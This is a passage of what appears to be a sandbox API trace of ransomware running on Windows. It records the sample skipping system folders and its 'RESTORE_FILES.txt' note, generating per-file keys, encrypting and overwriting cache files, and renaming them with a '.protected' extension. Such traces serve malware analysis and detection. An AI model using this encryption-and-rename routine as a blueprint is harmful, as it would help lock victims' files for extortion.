HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001") returned 151 [0088.704] StrStrW (lpFirst="ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001", lpSrch=".zip") returned 0x0 [0088.704] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x5ee, lpOverlapped=0x0) returned 1 [0088.714] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffa12, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.714] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x5ee, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x5ee, lpOverlapped=0x0) returned 1 [0088.714] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.714] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, 
nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.715] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.715] CloseHandle (hObject=0x150) returned 1 [0088.715] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001.protected") returned 161 [0088.715] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\acf244f1a10d4dbed0d88eba0c43a9b5_ba1ab6c2bdfdf57799e8116e4002d001"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\acf244f1a10d4dbed0d88eba0c43a9b5_ba1ab6c2bdfdf57799e8116e4002d001.protected")) returned 1 [0088.716] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.716] lstrcmpiW (lpString1="B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852", lpString2="Windows") returned -1 [0088.716] lstrcmpiW (lpString1="B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852", lpString2="Program Files") returned -1 [0088.716] lstrcmpiW (lpString1="B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852", 
lpString2="Program Files (x86)") returned -1 [0088.716] lstrcmpiW (lpString1="B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852", lpString2="$Recycle.bin") returned 1 [0088.716] lstrcmpiW (lpString1="B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852", lpString2="System Volume Information") returned -1 [0088.716] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852") returned 151 [0088.716] StrStrIW (lpFirst="B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852", lpSrch=".protected") returned 0x0 [0088.716] lstrcmpW (lpString1="B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852", lpString2="RESTORE_FILES.txt") returned -1 [0088.716] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.716] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.716] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\b3bb9c1ba2d19e090ae305b2683903a0_6f0a84ce2ba99bd19d42c92610275852"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.717] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852") returned 151 [0088.717] StrStrW 
(lpFirst="B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852", lpSrch=".txt") returned 0x0 [0088.717] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852") returned 151 [0088.717] StrStrW (lpFirst="B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852", lpSrch=".rar") returned 0x0 [0088.717] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852") returned 151 [0088.717] StrStrW (lpFirst="B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852", lpSrch=".zip") returned 0x0 [0088.717] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x652, lpOverlapped=0x0) returned 1 [0088.722] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffff9ae, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.722] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x652, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x652, lpOverlapped=0x0) returned 1 [0088.722] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.723] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.723] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, 
lpOverlapped=0x0) returned 1 [0088.723] CloseHandle (hObject=0x150) returned 1 [0088.723] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852.protected") returned 161 [0088.723] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\b3bb9c1ba2d19e090ae305b2683903a0_6f0a84ce2ba99bd19d42c92610275852"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\b3bb9c1ba2d19e090ae305b2683903a0_6f0a84ce2ba99bd19d42c92610275852.protected")) returned 1 [0088.728] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.728] lstrcmpiW (lpString1="B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8", lpString2="Windows") returned -1 [0088.728] lstrcmpiW (lpString1="B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8", lpString2="Program Files") returned -1 [0088.728] lstrcmpiW (lpString1="B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8", lpString2="Program Files (x86)") returned -1 [0088.728] lstrcmpiW (lpString1="B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8", lpString2="$Recycle.bin") returned 1 [0088.728] lstrcmpiW (lpString1="B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8", lpString2="System Volume Information") returned -1 [0088.728] wnsprintfW (in: pszDest=0x4dfbb0, 
cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8") returned 151 [0088.728] StrStrIW (lpFirst="B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8", lpSrch=".protected") returned 0x0 [0088.728] lstrcmpW (lpString1="B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8", lpString2="RESTORE_FILES.txt") returned -1 [0088.728] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.729] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.729] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\b3bb9c1ba2d19e090ae305b2683903a0_b89a63ac6877bd1ed812438ce82c3eb8"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.730] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8") returned 151 [0088.730] StrStrW (lpFirst="B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8", lpSrch=".txt") returned 0x0 [0088.730] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8") returned 151 [0088.730] StrStrW (lpFirst="B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8", 
lpSrch=".rar") returned 0x0 [0088.730] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8") returned 151 [0088.730] StrStrW (lpFirst="B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8", lpSrch=".zip") returned 0x0 [0088.730] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x652, lpOverlapped=0x0) returned 1 [0088.737] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffff9ae, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.737] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x652, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x652, lpOverlapped=0x0) returned 1 [0088.738] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.738] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.738] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.738] CloseHandle (hObject=0x150) returned 1 [0088.738] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8.protected") returned 161 [0088.738] MoveFileW 
(lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\b3bb9c1ba2d19e090ae305b2683903a0_b89a63ac6877bd1ed812438ce82c3eb8"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\b3bb9c1ba2d19e090ae305b2683903a0_b89a63ac6877bd1ed812438ce82c3eb8.protected")) returned 1 [0088.739] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.739] lstrcmpiW (lpString1="BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150", lpString2="Windows") returned -1 [0088.739] lstrcmpiW (lpString1="BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150", lpString2="Program Files") returned -1 [0088.739] lstrcmpiW (lpString1="BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150", lpString2="Program Files (x86)") returned -1 [0088.739] lstrcmpiW (lpString1="BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150", lpString2="$Recycle.bin") returned 1 [0088.739] lstrcmpiW (lpString1="BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150", lpString2="System Volume Information") returned -1 [0088.739] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150") returned 151 [0088.739] StrStrIW (lpFirst="BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150", lpSrch=".protected") returned 0x0 [0088.739] lstrcmpW 
(lpString1="BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150", lpString2="RESTORE_FILES.txt") returned -1 [0088.739] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.740] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.740] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\bc570ec0de58335afaf92fdc8e3aa330_6ce6e578b5c8485b4be3c4d58e12f150"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.740] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150") returned 151 [0088.740] StrStrW (lpFirst="BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150", lpSrch=".txt") returned 0x0 [0088.740] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150") returned 151 [0088.740] StrStrW (lpFirst="BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150", lpSrch=".rar") returned 0x0 [0088.740] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150") returned 151 [0088.741] StrStrW (lpFirst="BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150", lpSrch=".zip") returned 0x0 [0088.741] ReadFile (in: 
hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x5ed, lpOverlapped=0x0) returned 1 [0088.742] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffa13, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.742] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x5ed, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x5ed, lpOverlapped=0x0) returned 1 [0088.742] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.742] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.742] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.743] CloseHandle (hObject=0x150) returned 1 [0088.746] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150.protected") returned 161 [0088.746] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\bc570ec0de58335afaf92fdc8e3aa330_6ce6e578b5c8485b4be3c4d58e12f150"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\bc570ec0de58335afaf92fdc8e3aa330_6ce6e578b5c8485b4be3c4d58e12f150.protected")) returned 1 [0088.747] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.747] lstrcmpiW (lpString1="BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC", lpString2="Windows") returned -1 [0088.747] lstrcmpiW (lpString1="BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC", lpString2="Program Files") returned -1 [0088.747] lstrcmpiW (lpString1="BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC", lpString2="Program Files (x86)") returned -1 [0088.747] lstrcmpiW (lpString1="BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC", lpString2="$Recycle.bin") returned 1 [0088.747] lstrcmpiW (lpString1="BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC", lpString2="System Volume Information") returned -1 [0088.747] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC") returned 151 [0088.747] StrStrIW (lpFirst="BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC", lpSrch=".protected") returned 0x0 [0088.747] lstrcmpW (lpString1="BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC", lpString2="RESTORE_FILES.txt") returned -1 [0088.747] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.747] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, 
pdwDataLen=0x295e794*=0x30) returned 1 [0088.747] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\bc570ec0de58335afaf92fdc8e3aa330_f4d449ca9e0eaccfe15946f8fcd349fc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.748] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC") returned 151 [0088.748] StrStrW (lpFirst="BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC", lpSrch=".txt") returned 0x0 [0088.748] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC") returned 151 [0088.748] StrStrW (lpFirst="BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC", lpSrch=".rar") returned 0x0 [0088.748] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC") returned 151 [0088.748] StrStrW (lpFirst="BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC", lpSrch=".zip") returned 0x0 [0088.748] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x5ed, lpOverlapped=0x0) returned 1 [0088.749] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffa13, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.750] WriteFile (in: 
